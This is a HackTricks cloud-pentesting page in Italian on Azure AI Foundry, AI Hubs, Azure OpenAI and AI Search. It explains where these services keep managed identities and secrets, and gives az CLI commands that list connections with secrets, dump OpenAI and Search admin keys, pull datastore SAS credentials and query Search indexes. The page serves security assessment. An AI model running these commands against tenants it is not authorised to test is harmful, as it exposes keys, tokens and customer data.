Files
hacktricks-cloud/src/pentesting-cloud/azure-security/az-services/az-ai-foundry.md

12 KiB

Az - AI Foundry, AI Hubs, Azure OpenAI & AI Search

{{#include ../../../banners/hacktricks-training.md}}

Perché questi servizi sono importanti

Azure AI Foundry è l'ombrello di Microsoft per costruire applicazioni GenAI. Un hub aggrega progetti AI, Azure ML workspaces, compute, data stores, registries, prompt flow assets e connessioni verso servizi downstream come Azure OpenAI e Azure AI Search. Ogni componente espone comunemente:

  • Long-lived API keys (OpenAI, Search, data connectors) replicate inside Azure Key Vault o workspace connection objects.
  • Managed Identities (MI) che controllano deployment, job di indicizzazione vettoriale, pipeline di valutazione dei modelli e operazioni Git/GitHub Enterprise.
  • Cross-service links (storage accounts, container registries, Application Insights, Log Analytics) che ereditano le permission a livello di hub/project.
  • Multi-tenant connectors (Hugging Face, Azure Data Lake, Event Hubs) che possono leak upstream credentials or tokens.

La compromissione di un singolo hub/project può quindi implicare il controllo sulle managed identities downstream, cluster di compute, endpoint online e qualsiasi indice di search o deployment OpenAI referenziato da prompt flow.

Componenti principali & superficie di sicurezza

  • AI Hub (Microsoft.MachineLearningServices/hubs): Oggetto di alto livello che definisce region, managed network, system datastores, default Key Vault, Container Registry, Log Analytics, e hub-level identities. Un hub compromesso permette a un attacker di inject nuove projects, registries o user-assigned identities.
  • AI Projects (Microsoft.MachineLearningServices/workspaces): Ospitano prompt flows, data assets, environments, component pipelines e online/batch endpoints. I projects ereditano le risorse dell'hub e possono anche override con il proprio storage, kv, e MI. Ogni workspace salva secrets sotto /connections e /datastores.
  • Managed Compute & Endpoints: Include managed online endpoints, batch endpoints, serverless endpoints, AKS/ACI deployments e on-demand inference servers. I token recuperati da Azure Instance Metadata Service (IMDS) dentro questi runtime solitamente riportano i role assignments della workspace/project MI (comunemente Contributor o Owner).
  • AI Registries & Model Catalog: Permettono la condivisione a livello regionale di modelli, environments, components, data e risultati di valutazione. Le registries possono sincronizzare automaticamente con GitHub/Azure DevOps, il che significa che PATs possono essere embed inside connection definitions.
  • Azure OpenAI (Microsoft.CognitiveServices/accounts with kind=OpenAI): Fornisce i modelli della famiglia GPT. L'accesso è controllato tramite role assignments + admin/query keys. Molti Foundry prompt flows conservano le chiavi generate come secrets o environment variables accessibili dai compute jobs.
  • Azure AI Search (Microsoft.Search/searchServices): Storage di vettori/indici tipicamente connesso tramite una Search admin key memorizzata inside una project connection. I dati dell'indice possono contenere sensitive embeddings, documenti recuperati o raw training corpora.

Architettura rilevante per la sicurezza

Managed Identities & Role Assignments

  • AI hubs/projects possono abilitare system-assigned o user-assigned identities. Queste identities di solito detengono ruoli su storage accounts, Key Vault, Container Registries, Azure OpenAI resources, Azure AI Search services, Event Hubs, Cosmos DB o API custom.
  • Online endpoints ereditano la project MI o possono essere override con una user-assigned MI dedicata per deployment.
  • Prompt Flow connections e Automated Agents possono richiedere token via DefaultAzureCredential; catturare la metadata endpoint dal compute fornisce token per movimento laterale.

Boundaries di rete

  • Hubs/projects supportano publicNetworkAccess, private endpoints, Managed VNet e regole managedOutbound. Un misconfigured allowInternetOutbound o scoring endpoints aperti permettono exfiltration diretta.
  • Azure OpenAI e AI Search supportano firewall rules, Private Endpoint Connections (PEC), shared private link resources, e trustedClientCertificates. Quando l'accesso pubblico è abilitato questi servizi accettano richieste da qualsiasi source IP che conosca la key.

Data & Secret Stores

  • Le deploy di default di hub/project creano uno storage account, Azure Container Registry, Key Vault, Application Insights, e uno Log Analytics workspace dentro un managed resource group nascosto (pattern: mlw-<workspace>-rg).
  • I workspace datastores referenziano blob/data lake containers e possono embed SAS tokens, service principal secrets o storage access keys.
  • Le workspace connections (per Azure OpenAI, AI Search, Cognitive Services, Git, Hugging Face, ecc.) conservano le credentials nella workspace Key Vault e le espongono tramite il management plane quando si lista la connection (i valori sono JSON codificati in base64).
  • AI Search admin keys forniscono pieno read/write access ad indici, skillsets, data sources e possono recuperare documenti che alimentano i sistemi RAG.

Monitoring & Supply Chain

  • AI Foundry supporta integrazione con GitHub/Azure DevOps per codice e prompt flow assets. OAuth tokens o PATs risiedono in Key Vault + connection metadata.
  • Model Catalog può fare mirror di artefatti Hugging Face. Se trust_remote_code=true, Python arbitrario viene eseguito durante il deployment.
  • Data/feature pipelines loggano su Application Insights o Log Analytics, esponendo connection strings.

Enumeration with az

# Install the Azure ML / AI CLI extension (if missing)
az extension add --name ml

# Enumerate AI Hubs (workspaces with kind=hub) and inspect properties
az ml workspace list --filtered-kinds hub --resource-group <RG> --query "[].{name:name, location:location, rg:resourceGroup}" -o table
az resource show --name <HUB> --resource-group <RG> \
--resource-type Microsoft.MachineLearningServices/workspaces \
--query "{location:location, publicNetworkAccess:properties.publicNetworkAccess, identity:identity, managedResourceGroup:properties.managedResourceGroup}" -o jsonc

# Enumerate AI Projects (kind=project) under a hub or RG
az resource list --resource-type Microsoft.MachineLearningServices/workspaces --query "[].{name:name, rg:resourceGroup, location:location}" -o table
az ml workspace list --filtered-kinds project --resource-group <RG> \
--query "[?contains(properties.hubArmId, '/workspaces/<HUB>')].{name:name, rg:resourceGroup, location:location}"

# Show workspace level settings (managed identity, storage, key vault, container registry)
az ml workspace show --name <WS> --resource-group <RG> \
--query "{managedNetwork:properties.managedNetwork, storageAccount:properties.storageAccount, containerRegistry:properties.containerRegistry, keyVault:properties.keyVault, identity:identity}"

# List workspace connections (OpenAI, AI Search, Git, data sources)
az ml connection list --workspace-name <WS> --resource-group <RG> --populate-secrets -o table
az ml connection show --workspace-name <WS> --resource-group <RG> --name <CONNECTION>
# For REST (returns base64 encoded secrets)
az rest --method GET \
--url "https://management.azure.com/subscriptions/<SUB>/resourceGroups/<RG>/providers/Microsoft.MachineLearningServices/workspaces/<WS>/connections/<CONN>?api-version=2024-04-01"

# Enumerate datastores and extract credentials/SAS
az ml datastore list --workspace-name <WS> --resource-group <RG>
az ml datastore show --name <DATASTORE> --workspace-name <WS> --resource-group <RG>

# List managed online/batch endpoints and deployments (capture identity per deployment)
az ml online-endpoint list --workspace-name <WS> --resource-group <RG>
az ml online-endpoint show --name <ENDPOINT> --workspace-name <WS> --resource-group <RG>
az ml online-deployment show --name <DEPLOYMENT> --endpoint-name <ENDPOINT> --workspace-name <WS> --resource-group <RG> \
--query "{identity:identity, environment:properties.environmentId, codeConfiguration:properties.codeConfiguration}"

# Discover prompt flows, components, environments, data assets
az ml component list --workspace-name <WS> --resource-group <RG>
az ml data list --workspace-name <WS> --resource-group <RG> --type uri_folder
az ml environment list --workspace-name <WS> --resource-group <RG>
az ml job list --workspace-name <WS> --resource-group <RG> --type pipeline

# List hub/project managed identities and their role assignments
az identity list --resource-group <RG>
az role assignment list --assignee <MI-PRINCIPAL-ID> --all

# Azure OpenAI resources (filter kind==OpenAI)
az resource list --resource-type Microsoft.CognitiveServices/accounts \
--query "[?kind=='OpenAI'].{name:name, rg:resourceGroup, location:location}" -o table
az cognitiveservices account list --resource-group <RG> \
--query "[?kind=='OpenAI'].{name:name, location:location}" -o table
az cognitiveservices account show --name <AOAI-NAME> --resource-group <RG>
az cognitiveservices account keys list --name <AOAI-NAME> --resource-group <RG>
az cognitiveservices account deployment list --name <AOAI-NAME> --resource-group <RG>
az cognitiveservices account network-rule list --name <AOAI-NAME> --resource-group <RG>

# Azure AI Search services
az search service list --resource-group <RG>
az search service show --name <SEARCH-NAME> --resource-group <RG> \
--query "{sku:sku.name, publicNetworkAccess:properties.publicNetworkAccess, privateEndpoints:properties.privateEndpointConnections}"
az search admin-key show --service-name <SEARCH-NAME> --resource-group <RG>
az search query-key list --service-name <SEARCH-NAME> --resource-group <RG>
az search shared-private-link-resource list --service-name <SEARCH-NAME> --resource-group <RG>

# AI Search data-plane (requires admin key in header)
az rest --method GET \
--url "https://<SEARCH-NAME>.search.windows.net/indexes?api-version=2024-07-01" \
--headers "api-key=<ADMIN-KEY>"
az rest --method GET \
--url "https://<SEARCH-NAME>.search.windows.net/datasources?api-version=2024-07-01" \
--headers "api-key=<ADMIN-KEY>"
az rest --method GET \
--url "https://<SEARCH-NAME>.search.windows.net/indexers?api-version=2024-07-01" \
--headers "api-key=<ADMIN-KEY>"

# Linkage between workspaces and search / openAI (REST helper)
az rest --method GET \
--url "https://management.azure.com/subscriptions/<SUB>/resourceGroups/<RG>/providers/Microsoft.MachineLearningServices/workspaces/<WS>/connections?api-version=2024-04-01" \
--query "value[?properties.target=='AzureAiSearch' || properties.target=='AzureOpenAI']"

Cosa cercare durante la valutazione

  • Ambito dell'identità: I progetti spesso riutilizzano una potente user-assigned identity assegnata a più servizi. Catturando token IMDS da qualsiasi managed compute si ereditano quei privilegi.
  • Oggetti di connessione: Il payload Base64 include il secret più i metadata (endpoint URL, API version). Molti team lasciano qui OpenAI + Search admin keys invece di ruotarle frequentemente.
  • Git & external source connectors: PATs o OAuth refresh tokens possono consentire accesso in push al codice che definisce pipeline/prompt flows.
  • Datastores & data assets: Forniscono SAS tokens validi per mesi; i data asset possono puntare a PII dei clienti, embeddings o training corpora.
  • Managed Network overrides: allowInternetOutbound=true o publicNetworkAccess=Enabled rende banale exfiltrate secrets da jobs/endpoints.
  • Hub-managed resource group: Contiene lo storage account (<workspace>storage), container registry, KV, e Log Analytics. L'accesso a quel RG spesso significa full takeover anche se il portal lo nasconde.

References

{{#include ../../../banners/hacktricks-training.md}}